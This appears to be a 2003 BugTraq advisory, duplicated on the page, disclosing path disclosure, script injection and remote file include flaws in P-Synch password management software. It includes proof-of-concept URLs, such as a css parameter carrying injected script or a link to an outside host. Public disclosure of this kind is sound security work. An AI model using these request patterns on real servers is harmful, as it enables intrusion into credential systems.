BugTraq
Back to list
|
Post reply
Multiple Vulnerabilities In P-Synch Password Management
May 29 2003 05:26AM
JeiAr (jeiar kmfms com)
Multiple Vulnerabilities In P-Synch Password Management
-------------------------------------------------------
The other night I came across a server running P-Synch.
I had never heard of it so i was curious to poke around
on it a bit. Within an hour i found the vulns listed below.
Im pretty sure there are other more serious vulns in
P-Synch, but they are very picky about who they give thier
software to, even an evaluation version. So was not able
to test any further. However i encourage any admins running
P-Synch to poke around on it, just to be on the safe side.
Description
-------------------------------------------------------
P-Synch Total Password Management Solution
by M-TECH
P-Synch is a total password management solution. It is
intended to reduce the cost of ownership of password systems,
and simultaneously improve the security of password protected
systems. This is done through: -Password Synchronization.
-Enforcing an enterprise wide password strength policy.
-Allowing authenticated users to reset their own forgotten
passwords and enable their locked out accounts. -Streamlining
help desk call resolution for password resets. P-Synch is
available for both internal use, on the corporate Intranet,
as well as for the Internet deployment in B2B and B2C
applications.
http://www.securityfocus.com/products/837
Problems
-------------------------------------------------------
All of these problems are simple, self explanatory vulns
so, i'm sure the below examples will speak for themselves.
Once again this application was NOT thoroughly researced.
So anyone with a copy of P-Synch might wanna explore it
further.
Path Disclosure Vulnerability
-------------------------------------------------------
https://path/to/psynch/nph-psa.exe?lang=
https://path/to/psynch/nph-psf.exe?lang=
Code Injection Vulnerability
-------------------------------------------------------
https://path/to/psynch/nph-psf.exe?css=">[VBScript, JScript etc]
https://path/to/psynch/nph-psa.exe?css=">[VBScript, JScript etc]
File Include Vulnerability
-------------------------------------------------------
https://path/to/psynch/nph-psf.exe?css=http://somesite/file
https://path/to/psynch/nph-psa.exe?css=http://somesite/file
Credits
-------------------------------------------------------
All credits go to JeiAr of GulfTech Computers and CSA
Security Research http://www.gulftech.org
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Multiple Vulnerabilities In P-Synch Password Management
-------------------------------------------------------
The other night I came across a server running P-Synch.
I had never heard of it so i was curious to poke around
on it a bit. Within an hour i found the vulns listed below.
Im pretty sure there are other more serious vulns in
P-Synch, but they are very picky about who they give thier
software to, even an evaluation version. So was not able
to test any further. However i encourage any admins running
P-Synch to poke around on it, just to be on the safe side.
Description
-------------------------------------------------------
P-Synch Total Password Management Solution
by M-TECH
P-Synch is a total password management solution. It is
intended to reduce the cost of ownership of password systems,
and simultaneously improve the security of password protected
systems. This is done through: -Password Synchronization.
-Enforcing an enterprise wide password strength policy.
-Allowing authenticated users to reset their own forgotten
passwords and enable their locked out accounts. -Streamlining
help desk call resolution for password resets. P-Synch is
available for both internal use, on the corporate Intranet,
as well as for the Internet deployment in B2B and B2C
applications.
http://www.securityfocus.com/products/837
Problems
-------------------------------------------------------
All of these problems are simple, self explanatory vulns
so, i'm sure the below examples will speak for themselves.
Once again this application was NOT thoroughly researced.
So anyone with a copy of P-Synch might wanna explore it
further.
Path Disclosure Vulnerability
-------------------------------------------------------
https://path/to/psynch/nph-psa.exe?lang=
https://path/to/psynch/nph-psf.exe?lang=
Code Injection Vulnerability
-------------------------------------------------------
https://path/to/psynch/nph-psf.exe?css=">[VBScript, JScript etc]
https://path/to/psynch/nph-psa.exe?css=">[VBScript, JScript etc]
File Include Vulnerability
-------------------------------------------------------
https://path/to/psynch/nph-psf.exe?css=http://somesite/file
https://path/to/psynch/nph-psa.exe?css=http://somesite/file
Credits
-------------------------------------------------------
All credits go to JeiAr of GulfTech Computers and CSA
Security Research http://www.gulftech.org
[ reply ]